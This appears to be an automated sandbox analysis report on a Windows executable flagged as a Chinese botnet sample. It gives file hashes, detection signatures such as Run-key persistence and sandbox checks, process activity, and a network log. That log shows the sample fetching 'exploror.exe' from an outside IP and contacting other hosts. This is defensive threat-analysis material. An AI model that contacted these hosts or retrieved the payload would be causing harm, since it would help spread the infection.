
Analysis

  • max time kernel
    41s
  • max time network
    291s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    23/12/2022, 04:47 UTC

General

  • Target

    1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

  • Size

    362KB

  • MD5

    99be0e637186d469b647525e9275ccfc

  • SHA1

    83a797037fd4c10f1248387395cc039aa9f3c71b

  • SHA256

    1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180

  • SHA512

    1477f8db399c74174379ff881f6dcd9148bf57ff29839c466259d4c17235254e66cfd0410e5d0d79304a1a4f8352910d64a4f1446f7ed9cd5ceccd285ed265d5

  • SSDEEP

    3072:N8jSZi34eTzl5KV2GenT0cTtm2LAQSXVqjzpYfJhrI:quZ5eg2GenQ67wk3pyJhrI

Malware Config

Signatures

  • Generic Chinese Botnet

    A botnet originating from China which is currently unnamed publicly.

  • Chinese Botnet payload 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
    "C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Windows directory
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c md C:\windowss64
      2⤵
        PID:1472

    Network

    • flag-unknown
      GET
      http://47.93.60.63:8000/exploror.exe
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      Remote address:
      47.93.60.63:8000
      Request
      GET /exploror.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: 47.93.60.63:8000
      Connection: Keep-Alive
      Response
      HTTP/1.1 503 �����޷���ȡ
      Content-Type: text/html
      Accept-Ranges: bytes
      Server: HFS 2.3i
      Set-Cookie: HFS_SID_=0.931278704432771; path=/; HttpOnly
      Content-Encoding: gzip
    • 47.93.60.63:8000
      http://47.93.60.63:8000/exploror.exe
      http
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      695 B
      1.6kB
      8
      5

      HTTP Request

      GET http://47.93.60.63:8000/exploror.exe

      HTTP Response

      503
    • 106.52.15.123:80
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      152 B
      80 B
      3
      2
    • 106.52.15.123:80
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      152 B
      40 B
      3
      1
    • 193.218.201.186:8000
      1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
      1.6kB
      841 B
      21
      20

    MITRE ATT&CK Enterprise v6


    Downloads

    • memory/1996-54-0x0000000074C11000-0x0000000074C13000-memory.dmp

      Filesize

      8KB

    • memory/1996-56-0x0000000010000000-0x0000000010018000-memory.dmp

      Filesize

      96KB
